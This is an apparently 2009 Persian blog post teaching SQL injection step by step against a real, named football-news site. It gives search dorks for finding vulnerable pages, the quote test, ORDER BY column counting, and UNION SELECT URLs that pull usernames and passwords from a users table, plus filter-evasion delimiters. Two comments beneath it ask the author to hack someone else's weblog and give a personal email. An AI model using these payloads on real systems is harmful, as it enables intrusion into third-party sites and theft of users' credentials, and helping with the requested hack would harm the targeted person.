۵.۱۲.۱۳۸۷

آموزش پیدا کردن باگ Sql

چند روش برای فهمیدن این که سایت آسیب پذیری Sql داره ، وجود داره!

1- سایت رو با یک اسکنر مانند : X-Scan یا Acunetix بررسی کنید و ببینید آیا از سایت باگ Sql پیدا می کنه یا نه !
2- در ادامه با این روش اشنا می شوید
من می خوام شما رو در این آموزش با روش 2 آشنا کنم!

خوب برای پیدا کردن سایت های آسیب پذیر تو گوگل چیزه خاصی نیستش که اگه اونو سرچ کنید حتما برانون یک چیزی بیاره ولیمی تونید از اینا استفاده کنید ! :

?id= یا news.php?id= یا .php?id= یا خیلی چیزای دیگه می تونید خودتون پیدا کنید!

حالا بعد از این که سایت آسیب پذیر رو پیدا کردید باید کارای زیر رو انجام بدید!
مثلا سایت اسیب پذیر ما اینجا اینه :

http://www.fifacz.com/

خوب حالا وقتی سایت رو باز می کنید رو یکی از مطالب سایت کلیک می کنیم که تقریبا مثل لینک زیر هست :

http://www.fifacz.com/index.php?news_id=2859

حالا برای فهمیدن این که این سایت باگ Sql داره ( روش 2 ) باید به ادامه ی سایت حرف ( ' ) رو اضافه کنیم که میشه مثل :

http://www.fifacz.com/index.php?news_id=-2859'

حالا ما یک اررور از سایت می گیریم که نشان دهنده ی آسیب پذیر بودم این سایت نسبت به Sql هست. اررور ها شکل های منفاوتی دارن که خودتون باید تشحیص بدید
بعضی از این اررور ها فرق می کنن و اصلا به درد ما نمی خورن. بیشتر اررور ها شبیه به این هستند و در این سایت هم به این شکل هست :

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/fifacz.com/www/mysql_news.php on line 14

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/www/fifacz.com/www/mysql_news.php on line 119

خوب حالا نوبت میرسه به پیدا کردن تعداد کلومن ها ( Clomn )
برای این کار باید از دستور ...Order+by+ استفاده کرد که به جای ... باید عددی رو بنویسید. مثلا تو این سایت با تایپ Url زیر با اررور بر می خوریم

http://www.fifacz.com/index.php?news_id=-2859+order+by+14--

پس باید Url بالا رو به لینک زیر تغییر بدیم :

http://www.fifacz.com/index.php?news_id=-2859+order+by+13--


در اصل شما باید حدس تعداد Clmn هارو حدس بزنید .... تا به یک ارور برسید. بعد از این که از سایت ارور گرفتید باید تک تک عددهارو پایین بیارید تا دیگه از سایت اررور نگیرید
بعدش باید روی +union+select+ کار کنیم که به شکل زیر است :

http://www.fifacz.com/index.php?news_id=-2850+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

خوب در این جا تعدادی عدد می بینید که در اصل همان Clmn ا هستند که باید اندازه ی تعداد به دست آمده عددهارو به ترتیب بنویسید

نکته مهم : در بعضی از سایت ها برای جدا کردن کلمات از هم از علامت های دیگر به چز + استفاده نمی شود که در زیر چنتاشون رو براتون می نویسم

1- /**/
2- Space
3- +

برای هریک یک مثال می زنم :



کد:

http://www.fifacz.com/index.php?news_id=-2859/**/order/**/by/**/13/* Or http://www.fifacz.com/index.php?news_id=-2859/**/order/**/by/**/13--



کد:

http://www.fifacz.com/index.php?news_id=-2859%20order%20by%2013--



کد:

http://www.fifacz.com/index.php?news_id=-2859+order+by+13--

خوب حالا تو صفحه ای که باز شدش می بینید تعدادی عدد نمایان شده
حالا باید به آخر لینکمون این رو اضافه کنیم :

+from+users--

مثال :



کد:

http://www.fifacz.com/index.php?news_id=-2850+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user--

در اینجا همون طور که می بینید عددهای 3 و 4 نمایش داده شده است که باید به جاشون نام Clomn هارو بزاریم.

تو بعضی از سایت ها کلمه های بالا جواب نمیده و باید از این کلمه های استفده کنید :

user,users,admin,administrator,.....

حالا ما باید به جای عددها ( که تو این سایت 3 و 4 هست ) کلمه های زیر رو قرار بدیم ( باید هر یک رو امتحان کنیم ببینیم کدوم جواب می دن )

admin_name,admin_pass,user,table_name ,table_pass,user_name, user_password

که در اینجا برای به دست آوردن نام کاربری باید از user_name استفاده کرد و برای بیرون کشیدن پسورد باید از user_password استفاده کرد. مثال :



کد:

http://www.fifacz.com/index.php?news_id=-2850+union+select+1,2,user_name,user_password,5,6,7,8,9,10,11,12,13+from+users--

حال Refresh کنید می بینید به جای عدد 3 و 4 یوزر و پسوردها نمایش داده شده است.

منبع:
www.k1-s1.blogfa.com

۲ نظر:

ناشناس گفت...

salam misheh ye sito baram hak konid kheili vajebe
man natoonestam ba code u kar konam
in shakhs dareh ba aberoo man bazi mikoneh
mamnoon
age misheh pm bezarid ta adresse weblogo behetoon bedem
thx.

ناشناس گفت...

salam bebakhshid yadam raft adresse bedam ke koja baram pm bezari
lorn_love63@yahoo.com
stormwater.blogfa.com
age mitoonid weblogo baram hak konid pm bezarid ta man adresse weblog tarafo baratoon bezaram.
thx.

http://up.iranblog.com/images/0z5dgraxwa4j49a5ts77.gif http://up.iranblog.com/images/gv83ah5giec9g8jkopmc.gif